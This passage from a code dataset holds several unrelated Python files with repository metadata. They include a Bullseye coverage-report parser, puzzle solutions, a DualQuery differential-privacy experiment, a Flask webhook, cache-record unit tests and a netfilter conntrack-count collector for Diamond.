self.incsvfile==None:\n            self.runcovfn()\n        else:\n            self.outcsvfile=self.incsvfile\n\n        # parse the csv file into missingfn csv string, and dictionaries: module:fncovered, module:fntotal, \n        # module:bccovered, module:bctotal\n        csvdata,fnucovered,fntotal,bcucovered,bctotal = self.processCSV()\n        self.modulelist=fntotal.keys()\n        self.modulelist.sort(key=str.lower)\n\n        # write the missing fn csv file\n        self.missingfnfile=self.basefile+'-missingfn.csv'\n        self.saveCSV(csvdata)\n\n        # calculate missing fn diff against milestone\n        self.prepareFileForDiff(self.basefile+'-milestone-missingfn.csv')\n        self.prepareFileForDiff(self.basefile+'-missingfn.csv')\n        cmd=\"diff -U 0 %s %s\" % (self.basefile+'-milestone-missingfn.csv.1',self.basefile+'-missingfn.csv.1')\n        process=subprocess.Popen(cmd,shell=True,stdout=open(self.basefile+'-missingfn-diffs.csv','w'),stderr=subprocess.STDOUT)\n        (stdout,stderr)=process.communicate()\n\n        # write the csv table for current build and csv table with build number and timestamp\n        self.info=self.basefile+'-info.csv'\n        self.summaryfn=self.basefile+'-summaryfn.csv'\n        self.generateSummaryTableFn(fnucovered,fntotal)\n        self.summarybc=self.basefile+'-summarybc.csv'\n        self.generateSummaryTableBc(bcucovered,bctotal)\n        \n        self.appendData(self.basefile+'-recentfn.csv',fnucovered,fntotal)\n        self.appendData(self.basefile+'-recentbc.csv',bcucovered,bctotal)\n        
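# per the module docstring: the 'recent' csvs above chart the current\n        # iteration (month), while the 'milestone' csvs below accumulate data\n        # across recent iterations/milestones.\n        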
self.appendData(self.basefile+'-milestonefn.csv',fnucovered,fntotal)\n        self.appendData(self.basefile+'-milestonebc.csv',bcucovered,bctotal)\n\n        print('finished') \n\n    def prepareFileForDiff(self,file):\n        f=open(file)\n        contents=f.read()\n        f.close()\n        newcontents=''\n        lines=contents.split('\\n')\n        for line in lines:\n            tokens=line.split(',')\n            if len(tokens)==0:\n                continue\n            tokens=tokens[1:]\n            newcontents+=\",\".join(tokens)+\"\\n\"\n        f=open(file+\".1\",\"w\")\n        f.write(newcontents)\n        f.close()\n\n    def usage(self,c):\n        print('usage: %s [options]' % sys.argv[0])\n        print('   --covfile      set the bullseye .cov file to be processed, assumes bullseye is installed')\n        print('   --incsvfile    set the csv file to load, the csv is returned by covfn --csv > file.csv,')\n        print('                  if not set covfn --csv is run')\n        print('   --build        set the build number')\n        sys.exit(c)\n\n    def parseOptions(self):\n        try:\n            opts,args = getopt.getopt(sys.argv[1:], self.options,self.longOptions)\n        except:\n            print(sys.exc_info()[1])\n            self.usage(2)\n\n        for o,v in opts:\n            if o in ('--covfile'):\n                self.covfile=v\n                if v.find('.')>-1:\n                    v=v[0:v.find('.')]\n                self.basefile=v\n            if o in ('--incsvfile'):\n                self.incsvfile=v\n                if v.find('.')>-1:\n                    v=v[0:v.find('.')]\n                self.basefile=v\n            if o in ('--build'):\n                self.build=v\n\n        if self.covfile==None and self.incsvfile==None:\n            print('--covfile or --incsvfile must be set')\n            sys.exit(1)\n\n    def runcovfn(self):\n        outfile=self.basefile+'.csv'\n        print('processing .cov binary to %s...' % outfile)\n        \n        covarg=''\n        if self.covfile!=None:\n            covarg='--file %s' % self.covfile\n\n        cmd='%s/covfn %s --no-banner --csv %s' % (self.bullseyedir,covarg,self.region)\n        if os.path.exists(outfile):\n            os.unlink(outfile)\n\n        process=subprocess.Popen(cmd,shell=True,stdout=open(outfile,'w'),stderr=subprocess.PIPE)\n        (stdout,stderr)=process.communicate()\n        self.outcsvfile=outfile\n\n    def processCSV(self):\n        print('parsing %s...' 
% self.outcsvfile)\n        lines=open(self.outcsvfile).read()\n        output=\"\"\n        # throw away header(1st) and summary(last) lines\n        lines=lines.split('\\n')[0:-1]\n        uncoveredfncount={}\n        totalfncount={}\n        uncoveredbccount={}\n        totalbccount={}\n        output+='build,module,source,function\\n'\n        modulefiles={}\n        for line in lines:\n            tokens=self.mysplit(line)\n            if len(tokens)<6:\n                continue\n            # check if file name contains extra directories\n            if tokens[1].find('repo/')>-1:\n                tokens[1]=tokens[1][tokens[1].find('repo/')+5:]\n            if tokens[1].find('tamarin-redux/')>-1:\n                tokens[1]=tokens[1][tokens[1].find('tamarin-redux/')+14:]\n            # set module to name before '/'\n            module=''\n            dirs=re.findall('[A-Za-z0-9_.-]+',tokens[1])\n            if len(dirs)>1:\n                module=dirs[0]\n            else:\n                continue\n            # skip modules for third-party apis\n            if module in self.skips:\n                continue\n            # check if function is not covered\n            if tokens[3]=='0':\n                output+='%s,%s,%s,\"%s\"\\n'%(self.build,module,tokens[1],tokens[0])\n                if uncoveredfncount.has_key(module)==False:\n                    uncoveredfncount[module]=0\n                uncoveredfncount[module]+=1\n            # add to function total\n            if totalfncount.has_key(module)==False:\n                totalfncount[module]=0\n            totalfncount[module]+=1\n            # add to b/c covered\n            if uncoveredbccount.has_key(module)==False:\n                uncoveredbccount[module]=0\n            uncoveredbccount[module]+=int(tokens[4])\n            # add to b/c total\n            if totalbccount.has_key(module)==False:\n                totalbccount[module]=0\n            totalbccount[module]+=int(tokens[5])\n        # flip b/c totals to make uncovered\n        for module in uncoveredbccount.keys():\n            uncoveredbccount[module]=totalbccount[module]-uncoveredbccount[module]\n        return output, uncoveredfncount, totalfncount, uncoveredbccount,totalbccount\n\n    def saveCSV(self,csvdata):\n        print('saving csv data to %s' % self.missingfnfile)\n        open(self.missingfnfile,'w').write(csvdata)\n\n    def appendData(self,filename,uncovered,total):\n        print('appending results to %s' % filename)\n        uncoveredsum=0\n        totalsum=0\n        for module in self.modulelist:\n            if uncovered.has_key(module)==False:\n                if total.has_key(module)==False:\n                    print('WARNING: module %s is not in module list' % module)\n                continue\n            uncoveredsum+=uncovered[module]\n            totalsum+=total[module]\n        percent=self.calcpercent(uncoveredsum,totalsum)\n        if os.path.exists(filename)==False:\n            print(\"ERROR: file %s does not exist, generating new file\" % filename)\n            contents=\"build\\ncore\\nnanojit\\nMMgc\\ngenerated\\nplatform\\nextensions\\nVMPI\\nvmbase\"\n        else:\n            contents=open(filename).read()\n        newcontents=''\n        lines=contents.split('\\n')\n        for line in lines:\n            if line=='':\n                continue\n            tokens=line.split(',')\n            if tokens[0]=='build':\n                value=self.build\n            elif tokens[0]=='total':\n                value=percent\n            elif tokens[0] not in self.modulelist:\n                value=\"0\"\n            else:\n                if uncovered.has_key(tokens[0])==False:\n                    uncov=0\n                else:\n                    uncov=uncovered[tokens[0]]\n                value=self.calcpercent(uncov,total[tokens[0]])\n            newcontents+=\"%s,%s\\n\" % (line,value)\n        f=open(filename,'w')\n        f.write(newcontents)\n        f.close()\n\n    def generateSummaryTableFn(self,fnuncovered,fntotal):\n        print('generating fn summary data...')\n        if os.path.exists(self.summaryfn):\n            os.unlink(self.summaryfn)\n        fnuncoveredsum=0\n        fntotalsum=0\n        contents='module,uncovered functions,total functions,% function coverage\\n'\n        for module in self.modulelist:\n            if fnuncovered.has_key(module)==False:\n                continue\n            fnuncoveredsum+=fnuncovered[module]\n            fntotalsum+=fntotal[module]\n            contents+='%s,%s,%s,%s%s\\n' % (module,fnuncovered[module],fntotal[module],self.calcpercent(fnuncovered[module],fntotal[module]),'%')\n        
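For reference, the getopt-based parseOptions above could be expressed with argparse, which generates the usage text automatically. A minimal sketch, not a drop-in replacement, since the original also derives basefile from the option value:

import argparse

def parse_options():
    parser = argparse.ArgumentParser()
    parser.add_argument('--covfile', help='bullseye .cov file to be processed')
    parser.add_argument('--incsvfile', help='csv file produced by covfn --csv')
    parser.add_argument('--build', default='unknown', help='build number')
    args = parser.parse_args()
    # Mirror the original mutual-requirement check.
    if args.covfile is None and args.incsvfile is None:
        parser.error('--covfile or --incsvfile must be set')
    return args
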
contents+='total,%s,%s,%s%s\\n' % (fnuncoveredsum,fntotalsum,self.calcpercent(fnuncoveredsum,fntotalsum),'%')\n open(self.summaryfn,'w').write(contents)\n open(self.info,'w').write('current build: %s,function coverage: %s%s' % \n (self.build,\n self.calcpercent(fnuncoveredsum,fntotalsum),'%')\n )\n\n def generateSummaryTableBc(self,bcuncovered,bctotal):\n print('generating bc summary data...')\n if os.path.exists(self.summarybc):\n os.unlink(self.summarybc)\n bcuncoveredsum=0\n bctotalsum=0\n contents='module,uncovered branches,total branches,% branch coverage\\n'\n for module in self.modulelist:\n if bcuncovered.has_key(module)==False:\n continue\n bcuncoveredsum+=bcuncovered[module]\n bctotalsum+=bctotal[module]\n contents+='%s,%s,%s,%s%s\\n' % (module,bcuncovered[module],bctotal[module],self.calcpercent(bcuncovered[module],bctotal[module]),'%')\n contents+='total,%s,%s,%s%s\\n' % (bcuncoveredsum,bctotalsum,self.calcpercent(bcuncoveredsum,bctotalsum),'%')\n open(self.summarybc,'w').write(contents)\n open(self.info,'a').write(',branch coverage: %s%s,updated: %s' % \n (self.calcpercent(bcuncoveredsum,bctotalsum),'%',\n datetime.datetime.today().strftime('%Y-%m-%d %H:%M'))\n )\n\n def generateSummary(self, file, modulescount):\n print('generating summary %s...' % file)\n\n if os.path.exists(file)==False:\n summaryFile=open(file,'w')\n summaryFile.write('build\\n')\n for module in self.modulelist:\n summaryFile.write('%s\\n' % module)\n summaryFile.close()\n\n modules=modulescount.keys()\n modulefile=open(file).read()\n modulefilelistupdated=''\n fieldslen=0\n for line in modulefile.split('\\n'):\n if line=='':\n continue\n # check if historical builds exceed max\n tokens=line.split(',')\n if len(tokens)>self.maxBuilds:\n first=tokens[0]\n tokens=tokens[(len(tokens)-self.maxBuilds+1):]\n tokens.insert(0,first)\n line=\",\".join(tokens)\n if line.startswith('build'):\n modulefileupdated=line+','+self.build+'\\n'\n else:\n fields=line.split(',')\n fieldslen=len(fields)\n if modulescount.has_key(fields[0]):\n modulefileupdated+=\"%s,%s\\n\" % (line,modulescount[fields[0]])\n modules.remove(fields[0])\n\n for newmodule in modules:\n line=newmodule\n for i in range(fieldslen-1):\n line+=',0'\n line='%s,%s\\n' % (line,modulescount[newmodule])\n modulefileupdated+=line\n open(file,'w').write(modulefileupdated)\n\n def generatePercentSummary(self, file, modulescount, totalmodulescount):\n print('generating percent function summary data...')\n\n if os.path.exists(file)==False:\n summaryFile=open(file,'w')\n summaryFile.write('build\\n')\n for module in self.modulelist:\n summaryFile.write('%s\\n' % module)\n summaryFile.close()\n modulefile=open(file).read()\n modulefilelistupdated=''\n fieldslen=0\n modules=modulescount.keys()\n for line in modulefile.split('\\n'):\n if line=='':\n continue\n # check if historical builds exceed max\n tokens=line.split(',')\n if len(tokens)>self.maxBuilds:\n first=tokens[0]\n tokens=tokens[(len(tokens)-self.maxBuilds+1):]\n tokens.insert(0,first)\n line=\",\".join(tokens)\n if line.startswith('build'):\n modulefileupdated=line+','+self.build+'\\n'\n else:\n fields=line.split(',')\n fieldslen=len(fields)\n if modulescount.has_key(fields[0]):\n modulefileupdated+=\"%s,%s\\n\" % (line,self.calcpercent(modulescount[fields[0]],totalmodulescount[fields[0]]))\n modules.remove(fields[0])\n for newmodule in modules:\n line=newmodule\n for i in range(fieldslen-1):\n line+=',0'\n line='%s,%s\\n' % (line,self.calcpercent(modulescount[newmodule],totalmodulescount[newmodule]))\n 
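A worked illustration of the history-capping slice used by generateSummary and generatePercentSummary in this file (the values below are invented): the row label is kept, the oldest value columns are dropped so that after the new build's value is appended the row holds the label plus at most maxBuilds values.

max_builds = 4
tokens = ['core', '10', '9', '8', '7', '6']   # label plus five historical values
if len(tokens) > max_builds:
    first = tokens[0]
    tokens = tokens[(len(tokens) - max_builds + 1):]   # keep the newest max_builds-1 values
    tokens.insert(0, first)                            # put the row label back in front
print(tokens)   # ['core', '8', '7', '6'] -- appending one new value brings it to 4 values
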
modulefileupdated+=line\n open(file,'w').write(modulefileupdated)\n \n def calcpercent(self,value,total):\n value=float(value)\n total=float(total)\n pct=(total-value)*100.0/total\n return '%.1f' % pct\n\n # workaround since python split does not allow \" to span multiple tokens\n # \"func1(param1,param)\",\"foo\",\"foo\" would not split correctly\n def mysplit(self,line):\n tokens=[]\n while True:\n if len(line)==0:\n break\n if line[0]=='\"':\n line=line[1:]\n if line.find('\"')==-1:\n tokens.append(line)\n break\n tokens.append(line[0:line.find('\"')])\n line=line[line.find('\"')+2:]\n else:\n if line.find(',')==-1:\n tokens.append(line)\n break\n else:\n tokens.append(line[0:line.find(',')])\n line=line[line.find(',')+1:]\n return tokens \n\nif __name__ == '__main__':\n p = ParseCodeCoverage()\n","repo_name":"adobe-flash/crossbridge","sub_path":"avmplus/build/buildbot/slaves/all/util-parse-codecoverage.py","file_name":"util-parse-codecoverage.py","file_ext":"py","file_size_in_byte":17543,"program_lang":"python","lang":"en","doc_type":"code","stars":538,"dataset":"github-code","pt":"48"} +{"seq_id":"21610110722","text":"import itertools\n\nfrom utils import read_data, get_lines\n\n\ndef checksum(data):\n return sum(max(row) - min(row) for row in data)\n\n\ndef fancy_checksum(data):\n total = 0\n for row in data:\n for pair in itertools.combinations(row, 2):\n a, b = sorted(pair)\n if b % a == 0:\n total += b // a\n\n return total\n\n\ndef run_tests():\n assert checksum([\n [5, 1, 9, 5],\n [7, 5, 3],\n [2, 4, 6, 8],\n ]) == 18\n assert fancy_checksum([\n [5, 9, 2, 8],\n [9, 4, 7, 3],\n [3, 8, 6, 5],\n ]) == 9\n\n\nif __name__ == \"__main__\":\n run_tests()\n print(\"All tests passed\")\n\n data = [\n [int(cell) for cell in line.split()]\n for line in get_lines(read_data(2))\n ]\n print(\"Part 1: {}\".format(checksum(data)))\n print(\"Part 2: {}\".format(fancy_checksum(data)))\n","repo_name":"julianandrews/adventofcode","sub_path":"2017/d02.py","file_name":"d02.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"24118643317","text":"\"\"\" This is the main code for Dual Query Algorithm\"\"\"\nimport itertools\nimport json\nfrom pathlib import Path\nfrom pickle import dump, load\nfrom sys import argv\nfrom time import time, strftime\n\nimport pulp\nimport numpy as np\n\n\ntraining_qcache = {}\ntest_qcache = {}\n\n\ndef create_dataset(n, nbits):\n \"\"\" Create Synthetic Dataset\n\n Args:\n n: Number of rows in dataset\n nbits: Number of columns in dataset\n\n Returns:\n The dataset as a list of lists. 
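The mysplit helper in the coverage parser above hand-rolls the parsing of quoted CSV fields because a plain str.split(',') would break function names such as "func1(param1,param2)". The standard csv module already handles quoted fields that contain commas; a minimal sketch (the sample row is invented, loosely mirroring covfn's CSV output):

import csv

line = '"func1(param1,param2)","vm/core.cpp","3","0","12","40"'
tokens = next(csv.reader([line]))
print(tokens[0])   # func1(param1,param2) -- the embedded comma survives
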
\n \"\"\"\n D = []\n for _ in range(n):\n # generate 1 row\n D.append(np.random.randint(2, size=nbits))\n\n return D\n\ndef nC3(n):\n \"\"\" Computes n choose 3 \"\"\" \n return (n * (n-1) * (n-2)) // 6\n\ndef sample_queries(Q, Qdist, samples):\n \"\"\" Sample the queries from Query set according to the Query Distribution\n\n Args:\n Q: Query set\n Qdist: Query Distribution\n samples: Number of queries to be sampled\n\n Returns:\n List of sampled queries\n \"\"\" \n result = []\n # since np.random.choice can only sample from 1D array, we use indices\n queries = list(range(len(Q)))\n for _ in range(int(samples)):\n # pick a random index based on Qdist and take the query at that index\n result.append(Q[np.random.choice(queries, p=Qdist)])\n return result\n\ndef query_3marginal(row, query):\n \"\"\" Run a 3 marginal query on a row\n\n Args:\n row: row from dataset\n query: query to run\n\n Returns:\n 1 if row satisfies query, 0 otherwise\n \"\"\" \n result = 1\n # Query Format: {sign, column1, column2, column3, complement1, complement2, complement3}\n # run for each column\n for i in range(3):\n # get column number\n col = query[1 + i]\n # get corresponding complement bit (1 if complement 0 if not)\n complement = query[4 + i]\n # the result is 1 only if the bit at column and complement bit differ\n # this can be done by taking XOR\n result &= int(row[col]) ^ complement\n # flip the result if sign bit is set otherwise don't\n return result ^ 1 if query[0] else result\n\ndef query_3marginal_db(D, query):\n \"\"\" Run a 3 marginal query on Dataset\n\n Args:\n D: Dataset\n query: query to run\n\n Returns:\n Normalized result between 0 and 1\n \"\"\" \n # run query on each row and normalize the result\n return sum([query_3marginal(row, query) for row in D]) / len(D)\n\ndef query_3marginal_db_cached(query, cache):\n \"\"\" Run a 3 marginal query on Dataset using cache\n\n Args:\n query: query to run\n cache: a cached dictionary mapping query to corresponding result on dataset\n\n Returns:\n Normalized result between 0 and 1\n \"\"\" \n return cache[query]\n\ndef payoff(D, q, x):\n \"\"\" Calculate payoff using equation q(x) - q(D)\n\n Args:\n D: Dataset\n q: query to run\n x: a row from dataset\n\n Returns:\n payoff between -1 and 1\n \"\"\" \n return query_3marginal(x, q) - query_3marginal_db_cached(q, training_qcache)\n\ndef get_queries(nqueries, nbits):\n \"\"\" Generate random 3-Marginal queries\n Query Format: {sign, column1, column2, column3, complement1, complement2, complement3}\n\n Args:\n nqueries: number of queries to be generated\n nbits: number of columns in dataset\n\n Returns:\n Two lists of queries, first for training(70%) and second for testing(30%)\n \"\"\" \n result = []\n\n signs = [0, 1]\n columns = set()\n # generate unique triplet of unique columns\n while len(columns) < nqueries:\n triple = set()\n while len(triple) < 3:\n triple.add(np.random.randint(nbits))\n triple = sorted(triple)\n columns.add(tuple(triple))\n\n # split column set into training(70%) and test(30%)\n columns = list(columns)\n split_index = int(0.7 * nqueries)\n training, test = columns[:split_index], columns[split_index:]\n\n \n results = [training, test]\n for i in range(len(results)):\n datasplit = results[i]\n # generate all complements [0 0 0] to [1 1 1]\n complements = itertools.product(range(2), repeat=3)\n # take cross product of datasplit with complement to concatenate\n # each row of complement to each triplet in datasplit\n result = itertools.product(datasplit, complements)\n # do similar 
procedure to concatenate sign with result,\n result = list(itertools.product(signs, result))\n # currently each element in result is not flattened but is a list of tuples\n # Now flatten each element in the result so that it conforms to query format\n results[i] = [tuple([x[0]] + list(itertools.chain(*x[1]))) for x in result]\n\n return results[0], results[1]\n\ndef run_experiment(eta, steps, samples, D, Q, Qtest):\n \"\"\" Execute a single run of the algorithm for given parameters\n\n Args:\n eta: learning rate eta\n steps: number of iterations / number of rows generated in output dataset\n samples: number of queries to be sampled from query set\n D: Original Dataset\n Q: Query set\n Qtest: Set of queries to test accuracy\n\n Returns:\n A dictionary of average error, max error and runtime\n \"\"\" \n\n n = len(D)\n # initialize Query distribution as uniform distribution\n Qdist = np.array([1/len(Q) for _ in range(len(Q))])\n print('steps =', steps, 'eta =', eta, 'samples =', samples)\n\n synthetic_db = []\n start = time()\n for t in range(steps):\n print('step {:3d}/{}'.format(t + 1, steps), end='\\r', flush=True)\n sampled_queries = np.array(sample_queries(Q, Qdist, samples))\n\n # count number of positive and negative queries\n npositive = nnegative = 0\n for query in sampled_queries:\n if query[0]:\n nnegative += 1\n else:\n npositive += 1\n\n # create model and variables for the model\n model = pulp.LpProblem('Dual Query', pulp.LpMaximize)\n x = np.array([pulp.LpVariable('x' + str(i), cat='Binary') for i in range(nbits)])\n c = np.array([pulp.LpVariable('c' + str(i), cat='Binary') for i in range(npositive)])\n d = np.array([pulp.LpVariable('d' + str(i), cat='Binary') for i in range(nnegative)])\n\n model += sum(c) + sum(d), 'Objective function'\n\n # go through each sampled query and add a constraint to the model\n # depending on the type of query\n\n\n countp = countn = 0 #used for tracking index of c and d variables\n for query in sampled_queries:\n vars = []\n for i in range(3):\n col = query[1 + i]\n complement = query[4 + i]\n vars.append(1 - x[col] if complement else x[col])\n if not query[0]: # query is positive\n model += sum(vars) - 3 * c[countp] >= 0\n countp += 1\n else:\n model += -sum(vars) - d[countn] + 3 >= 0\n countn += 1\n # run the solver\n model.solve()\n\n # Using valueOrDefault, free variable with value None are set to 0\n xt = np.array([xvar.valueOrDefault() for xvar in x])\n\n # update the query distribution and normalize\n for i in range(len(Q)):\n Qdist[i] = np.exp(-eta * payoff(D, Q[i], xt)) * Qdist[i]\n psum = sum(Qdist)\n Qdist /= psum\n\n # add this row to synthetic dataset\n synthetic_db.append(xt)\n\n print()\n runtime = time() - start\n\n # calculate maximum error and average error\n result = []\n max_error = avg_error = 0\n for query in Qtest:\n diff = query_3marginal_db_cached(query, test_qcache) \\\n - query_3marginal_db(synthetic_db, query)\n max_error = max(max_error, abs(diff))\n avg_error += abs(diff)\n result.append(diff)\n\n avg_error /= len(result)\n return {\n 'average': avg_error,\n 'max': max_error,\n 'runtime': runtime\n }\n\ndef average_nexperiments(n, start_time, **kwargs):\n \"\"\" Run the algorithm for multiple runs and log the average of results\n\n Args:\n n: number of runs\n start_time: start_time used for logging\n **kwargs: keyword arguments for run_experiment\n \"\"\" \n avg_error = 0\n max_error = 0\n runtime = 0\n\n # run experiment for n number of runs\n for i in range(1, n + 1):\n print('run {}'.format(i))\n result = 
run_experiment(**kwargs)\n avg_error += result['average']\n max_error += result['max']\n runtime += result['runtime']\n\n max_error /= n\n avg_error /= n\n runtime /= n\n\n # write to log file\n with open('log_{}.json'.format(start_time), 'a') as log:\n dump = {\n 'steps': kwargs['steps'],\n 'eta': kwargs['eta'],\n 'samples': kwargs['samples'],\n 'max_error': max_error,\n 'avg_error': avg_error,\n 'runtime': runtime,\n 'n': len(kwargs['D'])\n }\n\n log.write(json.dumps(dump, sort_keys=True) + '\\n')\n\ndef cache_results(D, Q, Qtest):\n \"\"\" Generating cache for Query set and Test Query set using Dataset\n saves results to global variables training_qcache and test_qcache\n\n Args:\n D: Dataset\n Q: Query set\n Qtest: Test Query set\n \"\"\" \n # avoid global lookups for performance\n test_cache = test_qcache\n training_cache = training_qcache\n\n i = 1\n n = len(Q) + len(Qtest)\n\n for query in Q:\n training_cache[query] = query_3marginal_db(D, query)\n print('query {}/{}'.format(i, n), end='\\r', flush=True)\n i += 1\n for query in Qtest:\n test_cache[query] = query_3marginal_db(D, query)\n print('query {}/{}'.format(i, n), end='\\r', flush=True)\n i += 1\n print()\n\ndef calculate_nsteps(eps_min, eps_max, step_count, eta, samples, nrows):\n \"\"\" Calculate `step_count` number of steps for a given range of epsilon\n using given parameters\n\n Args:\n eps_min: lower bound of epsilon\n eps_max: upper bound of epsilon\n step_count: number to steps to calculate\n eta: learning rate eta\n samples: number of samples used in algorithm\n nrows: number of rows in original dataset\n\n Returns:\n a list of generated step values\n \"\"\" \n eps_increment = (eps_max - eps_min) / (step_count - 1)\n\n result = set()\n\n for i in range(step_count):\n current_eps = eps_min + i * eps_increment\n x = (current_eps * nrows) / (eta * samples)\n T1, T2 = np.roots([1, -1, -x]).real\n if T1 >= 1:\n result.add(int(T1))\n if T2 >= 1:\n result.add(int(T2))\n\n return list(result)\n\nif __name__ == '__main__':\n argc = len(argv)\n if argc != 2:\n print('usage: dualquery \\npickle-file contains original'\n ' binary dataset as list of lists')\n exit(1)\n\n pickle_file = argv[1]\n D = load(open(pickle_file, 'rb'))\n n = len(D)\n nbits = len(D[0])\n nqueries = 10000\n print('n = {}, nbits = {}, nqueries = {}'.format(n, nbits, nqueries))\n\n cachefile = 'qcache_r-{}_c-{}_q-{}.p'.format(n, nbits, nqueries)\n # if cache file exists load it, otherwise create cache file and save it\n if Path(cachefile).exists():\n print('Found cache file: {}'.format(cachefile))\n start = time()\n training_qcache, test_qcache = load(open(cachefile, 'rb'))\n Q = list(training_qcache.keys())\n Qtest = list(test_qcache.keys())\n print('Read cache file in {}s'.format(time() - start))\n else:\n print('Generating queries...')\n start = time()\n Q, Qtest = get_queries(nqueries, nbits)\n print('Created queries in {}s'.format(time() - start))\n print('Creating cache...')\n start = time()\n cache_results(D, Q, Qtest)\n print('Generated cache in {}s'.format(time() - start))\n with open(cachefile, 'wb') as cf:\n dump([training_qcache, test_qcache], cf)\n\n\n t = strftime('%m-%d-%H-%M-%S')\n eta = 0.1\n samples = 50\n # get list of steps variable\n steps_list = calculate_nsteps(eps_min=0.1, eps_max=5.0, step_count=15,\n eta=eta, samples=samples, nrows=n)\n\n for steps in steps_list:\n average_nexperiments(3, t, eta=eta, steps=steps,\n samples=samples, D=D, Q=Q, 
Qtest=Qtest)\n","repo_name":"ssbl/cse660","sub_path":"project/dualquery.py","file_name":"dualquery.py","file_ext":"py","file_size_in_byte":12399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"3303619753","text":"\n# https://leetcode.com/problems/gas-station/\n\nfrom typing import List  # needed to run outside the LeetCode judge, which pre-imports typing names\n\nclass Solution:\n    def canCompleteCircuit(self, gas: List[int], cost: List[int]) -> int:\n        if sum(gas) < sum(cost):\n            return -1\n        total_cost = [gas[i] - cost[i] for i in range(len(cost))]\n        start = 0\n        end = 1\n        running_sum = 0\n        while end != start:\n            running_sum += total_cost[end - 1]\n            while running_sum < 0:\n                running_sum -= total_cost[start]\n                start = (start + 1) % len(gas)\n            end = (end + 1) % len(gas)\n        return start\n","repo_name":"Infinidrix/competitive-programming","sub_path":"Day 26/canCompleteCircuit.py","file_name":"canCompleteCircuit.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"9633687399","text":"from flask import Flask, request, jsonify\nimport threading\nimport ssl\n\n\n#-----------------------------------------------------------------------------------------------------------------------------------\n#SERVER WEBHOOK\napp = Flask(__name__)\n\n@app.route('/webhook', methods=['POST'])\ndef webhook():\n    if request.method == 'POST':\n        if request.headers['Content-Type'] == 'application/json':\n            data = request.json\n            # Process the order data according to your needs\n            print(data)\n            # Perform the necessary actions with the order data here\n            return jsonify({'message': 'Request received successfully'}), 200\n        else:\n            return jsonify({'error': 'Invalid request'}), 400\n    else:\n        return jsonify({'error': 'Method not allowed'}), 405\n\nif __name__ == '__main__':\n    # Before starting Flask, check whether we are on the main thread\n    if threading.current_thread() == threading.main_thread():\n        app.run(debug=True, port=8501, host=\"0.0.0.0\", ssl_context=\"adhoc\")\n    else:\n        print(\"The Flask application cannot be run from a secondary thread.\")\n","repo_name":"rfullivarri/Pranna_Orders","sub_path":"woocommerce/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"9657945821","text":"import unittest\nfrom datetime import datetime, timedelta\n\nfrom cacheanalysis.collections import RecordCollection\nfrom cacheanalysis.models import CacheMissRecord, CacheHitRecord, CacheDeleteRecord\n\n_BLOCK_HASH_1 = \"123\"\n_BLOCK_HASH_2 = \"456\"\n_BLOCK_HASH_3 = \"789\"\n_TIMESTAMP = datetime(year=2000, month=1, day=1)\n_SIZE = 10\n\n\nclass TestRecordCollection(unittest.TestCase):\n    \"\"\"\n    Unit tests for `RecordCollection`.\n    \"\"\"\n    def setUp(self):\n        self.records = [\n            CacheMissRecord(_BLOCK_HASH_1, _TIMESTAMP, _SIZE),\n            CacheMissRecord(_BLOCK_HASH_2, _TIMESTAMP, _SIZE),\n            CacheHitRecord(_BLOCK_HASH_1, _TIMESTAMP + timedelta(days=1)),\n            CacheDeleteRecord(_BLOCK_HASH_1, _TIMESTAMP + timedelta(days=2)),\n            CacheMissRecord(_BLOCK_HASH_1, _TIMESTAMP + timedelta(days=3), _SIZE),\n            CacheHitRecord(_BLOCK_HASH_1, _TIMESTAMP + timedelta(days=4)),\n            CacheHitRecord(_BLOCK_HASH_1, _TIMESTAMP + timedelta(days=5))\n        ]\n        self.record_collection = RecordCollection()\n        for record in self.records:\n            self.record_collection.add_record(record)\n\n    def test_contains_without_records(self):\n        self.assertCountEqual([], RecordCollection())\n
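The Flask webhook above (server.py) only accepts POSTs whose Content-Type header is application/json; anything else gets a 400. A hypothetical usage example with the requests library (the URL and payload are illustrative, not from the repository):

import requests

resp = requests.post(
    'https://localhost:8501/webhook',
    json={'order_id': 123, 'status': 'processing'},  # illustrative payload; json= sets the required Content-Type
    verify=False,  # the server runs with an ad-hoc self-signed certificate, so skip verification (emits a warning)
)
print(resp.status_code, resp.json())
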
        self.assertNotIn(self.records[0], RecordCollection())\n\n    def test_contains_with_records(self):\n        self.assertCountEqual(self.records, self.record_collection)\n        self.assertIn(self.records[0], self.record_collection)\n\n    def test_iterate_without_records(self):\n        self.assertCountEqual(set(), set(RecordCollection()))\n\n    def test_iterate_with_records(self):\n        self.assertCountEqual(set(self.records), set(self.record_collection))\n\n    def test_get_block_hits(self):\n        self.assertEqual(3, len(self.record_collection.get_block_hits(_BLOCK_HASH_1)))\n\n    def test_get_block_misses(self):\n        self.assertEqual(2, len(self.record_collection.get_block_misses(_BLOCK_HASH_1)))\n\n    def test_get_block_deletes(self):\n        self.assertEqual(1, len(self.record_collection.get_block_deletes(_BLOCK_HASH_1)))\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"wtsi-hgi/cache-analysis","sub_path":"cacheanalysis/tests/test_collections.py","file_name":"test_collections.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"4816158332","text":"# -*- coding: utf-8 -*-\n\"\"\"\n    Diamond collector that reports the count of connections\n    tracked by netfilter (nf_conntrack_count).\n\"\"\"\n\nimport subprocess\nimport diamond.collector\n\n\nclass NfConntrackCountCollector(diamond.collector.Collector):\n    \"\"\"Diamond collector that reports the count of\n    connections tracked by netfilter.\"\"\"\n\n    def get_default_config(self):\n        config = super(NfConntrackCountCollector, self).get_default_config()\n        config['path'] = 'network'\n        return config\n\n    def count_nf_connections_tracked(self):\n        try:\n            # Output example 'net.netfilter.nf_conntrack_count = 130698'\n            output = subprocess.check_output(\n                ['/sbin/sysctl', 'net.netfilter.nf_conntrack_count'],\n                stderr=subprocess.STDOUT\n            )\n            return int(output.split(\"=\")[1].strip())\n        except subprocess.CalledProcessError:\n            # sysctl can raise an exception if the ip_conntrack_count\n            # is not set, for example on systems without ferm/conntrack.\n            return 